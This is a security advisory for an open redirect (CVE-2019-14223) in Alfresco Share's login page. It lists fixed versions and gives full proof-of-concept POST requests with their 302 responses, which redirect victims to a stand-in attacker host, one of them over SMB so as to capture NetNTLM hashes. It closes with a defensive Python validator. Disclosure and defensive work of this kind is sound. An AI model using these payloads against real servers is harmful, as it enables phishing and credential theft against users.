CVE-2019-14223: Open Redirect in Alfresco Share
The Alfresco Share application, versions below 5.2.6, 6.0.N and 6.1.N, is vulnerable to an Open Redirect attack via a crafted POST request.
By manipulating the "failure" parameter, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g. http, https, ftp, smb).
Fixed Versions
| Fix Version |
|---|
| 5.2.6 |
| 6.0.N |
| 6.1.N |
Redirect Over the Same Protocol
This is a redirect over the same protocol used to access the login page (http/https). It can be used to send the client to a malicious website that is used for phishing or that targets the browser itself.
- Request:
```http
POST /share/page/dologin HTTP/1.1
Host: <TARGET_IP>:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

success=%2Fshare%2Fpage%2F&failure=:\\mal.hexor:4444\mal\evil.html&username=baduser&password=badpass
```
- Response:
```http
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: JSESSIONID=71***TRUNCATED***53; Path=/share; Secure; HttpOnly
Location: \\mal.hexor:4444\mal\evil.html
Content-Length: 0
Date: Mon, 13 May 2019 14:27:47 GMT
```
Redirect Over Specific Protocol (SMB, FTP, etc.)
In this case the "smb" protocol can be used to potentially exfiltrate the victim's NetNTLM hash.
- Request:
```http
POST /share/page/dologin HTTP/1.1
Host: <TARGET_IP>:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

success=%2Fshare%2Fpage%2F&failure=:smb:\\mal.hexor:4444\mal\evil.html&username=baduser&password=badpass
```
- Response:
```http
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: JSESSIONID=2C***TRUNCATED***DF; Path=/share; Secure; HttpOnly
Location: smb:\\mal.hexor:4444\mal\evil.html
Content-Length: 0
Date: Mon, 13 May 2019 15:23:34 GMT
```
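
For defenders, the sketch below shows the kind of server-side check that rejects both `failure` values shown above before they reach the `Location` header. It is an added example, not Alfresco's fix or code from this advisory; the `/share/` allow-list prefix and the function names are assumptions.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

ALLOWED_PREFIX = "/share/"  # assumption: legitimate targets live under the Share context path


def is_safe_redirect(target: str, allowed_prefix: str = ALLOWED_PREFIX) -> bool:
    """Accept only an absolute local path under allowed_prefix."""
    if not target or any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False  # empty value, or control characters such as CR/LF/tab
    if "\\" in target:
        return False  # browsers read "\" as "/", so "\\host" behaves like "//host"
    if not target.startswith("/") or target.startswith("//"):
        return False  # rejects "scheme:", a leading ":", and protocol-relative "//host"
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return False
    # Collapse "." and ".." before the prefix check so "/share/../x" cannot pass.
    normalised = posixpath.normpath(parts.path) + "/"
    return normalised.startswith(allowed_prefix)


def check_login_form(body: str) -> dict:
    """Map each redirect parameter to its value, or None when the value is rejected."""
    form = parse_qs(body, keep_blank_values=True)
    result = {}
    for name in ("success", "failure"):
        value = form.get(name, [""])[0]
        result[name] = value if is_safe_redirect(value) else None
    return result


# Request bodies copied from the two requests on this page.
SAME_PROTOCOL_BODY = r"success=%2Fshare%2Fpage%2F&failure=:\\mal.hexor:4444\mal\evil.html&username=baduser&password=badpass"
SMB_BODY = r"success=%2Fshare%2Fpage%2F&failure=:smb:\\mal.hexor:4444\mal\evil.html&username=baduser&password=badpass"

if __name__ == "__main__":
    for body in (SAME_PROTOCOL_BODY, SMB_BODY):
        print(check_login_form(body))
```

The check runs on the decoded form value and also rejects the forms seen in the two `Location` headers, where the leading `:` has already been dropped.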